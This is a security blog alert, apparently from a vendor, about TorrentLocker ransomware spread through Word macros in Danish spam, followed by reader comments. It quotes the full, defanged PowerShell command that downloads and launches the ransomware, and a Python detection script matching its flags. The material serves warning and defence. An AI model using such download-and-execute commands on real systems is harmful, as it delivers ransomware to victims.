Two large spam waves swept across Denmark in the past 5 days. Both carry the notorious TorrentLocker ransomware and feature a few new tricks.

Oblivious users are misled into opening a Microsoft Word document in which cybercriminals embedded a malicious macro.

If the victim enables the macro by clicking on “Enable Editing”, PowerShell code is executed that downloads ransomware from the TorrentLocker family.

[Image: TorrentLocker malicious document]

The encrypting malware is downloaded with an HTTP GET request from the following URL (sanitized for your protection):

*.js2-order[.]pl/file/set.rte

This is the complete PowerShell code (sanitized for your protection):

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent).DWnlOAdFILE('http://48f4339.js2-order[.]pl/file/set.rte','C:\Users\[%user profile%]\AppData\Roaming.EXE'); Start-process 'C:\Users\[%user profile%]\AppData\Roaming.exe'
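A detection sketch for the command line above, added here as an example (it is not code from this article or from CSIS): it scores process-creation events on the flags and objects the sample uses, matching case-insensitively because the sample randomises letter case. The event field names, the Office parent list, the WINWORD.EXE path and the threshold are assumptions, and the patterns go slightly beyond the sample by also accepting PowerShell's abbreviated parameter names.

```python
import re

# Case-insensitive indicators drawn from the command line quoted above.
# PowerShell also accepts abbreviated parameter names (-ep, -nop, -w), so the
# patterns allow those too. Nothing keys on the download method name: as
# printed in the sanitized sample ("DWnlOAdFILE") it is not a reliable string.
INDICATORS = {
    "policy_bypass": re.compile(r"-(ep|ex\w*)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop\w*", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "webclient": re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
    "start_process": re.compile(r"start-process\b", re.I),
    "exe_in_appdata": re.compile(r"\\appdata\\[^'\"]*\.exe", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumed list
ALERT_THRESHOLD = 4  # assumed tuning value


def score_event(event):
    """Score one process-creation event; returns (score, matched names)."""
    cmd = re.sub(r"\s+", " ", event["command_line"])
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(cmd))
    score = len(hits)
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:  # macro-launched PowerShell weighs double
        hits.append("office_parent")
        score += 2
    return score, hits


# Constructed events: the article's sanitized command and a benign admin job.
ARTICLE_EVENT = {
    "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
    "command_line": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe "
    r"PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden "
    r"(New-Object SYSTEm.nEt.wEBCLIent).DWnlOAdFILE("
    r"'http://48f4339.js2-order[.]pl/file/set.rte',"
    r"'C:\Users\[%user profile%]\AppData\Roaming.EXE'); "
    r"Start-process 'C:\Users\[%user profile%]\AppData\Roaming.exe'",
}
BENIGN_EVENT = {
    "parent_image": r"C:\Windows\System32\svchost.exe",
    "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
    r"-File C:\Scripts\backup.ps1",
}

if __name__ == "__main__":
    for ev in (ARTICLE_EVENT, BENIGN_EVENT):
        score, hits = score_event(ev)
        print("ALERT" if score >= ALERT_THRESHOLD else "ok", score, hits)
```

The benign job shares two flags with the sample, which is why the score combines several indicators with the parent process rather than alerting on any single flag.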

TorrentLocker immediately injects itself in the explorer.exe process.

This new TorrentLocker variant introduces a couple of new capabilities:

  • it harvests usernames and passwords from the infected computer
  • and it can spread to other computers through shared files.

Antivirus detection is still low: 3/55 on VirusTotal.

[Image: VirusTotal detection rates, February 28, 2017]

These spam waves are very aggressive, so please be extra cautious about protecting your inbox and carefully evaluate which emails you open. A similar spam wave that also spreads TorrentLocker still has a rather low detection rate, even 4 days after it was discovered: 19/56 on VirusTotal.

There is a tool that can decrypt data locked by some TorrentLocker variants, but it has not been tested on this new variant yet.

Our complete guide to email security might help. Also, make sure you check all the protection measures in this anti-ransomware plan.

Stay safe!

*This article features cyber intelligence provided by CSIS Security Group researchers.

You overwrote your “What is ransomware and 15 easy steps.” Please repost. It is a great summary article for cyber education.

Hi Jim! Thank you for noticing and for the kind feedback! We fixed the issue.

Frederik Bechmann on March 21, 2017 at 11:50 am

Hi Andra,

Very relevant post!

Being from Denmark, I’ve seen a lot of these scam mails at close hand (and of course, I’ve warned our customers).

Best regards,

It’s good to hear you found the alert useful, Frederik!

That my comment “is awaiting moderation” does not instill me with a great deal of confidence. I get the same message whenever I disagree with someone who is an obvious idiot on our national news service, the renowned CBC, the last great bastion of hypocrisy and feeble polemic in NA. God save us from marketeers and our own ignorance.

Hi Charles,

I’m not sure what you were looking to achieve here. There is plenty of information about the product on our website and we do reply and approve comments, but we also have weekends. For urgent matters, our support email address is always available and we’re also active on Facebook, Twitter, Instagram, LinkedIn and Google+, so there is no shortage of ways to reach us.

Your other comments were not approved because of the language and the way you chose to express your opinions.

Heimdal seems to offer little but “freeware” which is often outdated and/or unsupported by its originators, at least to my brief exploration. Are you just a reseller of alpha tech that may or may not be worth a look-at? And then offer “up-dates” to same crap-ware to line your pockets. Not like it doesn’t happen, but some truth would be refreshing.

I also got this today, with different sender ( henriette.nielsen@pakkepost ) and different attachment ( 363772.doc )
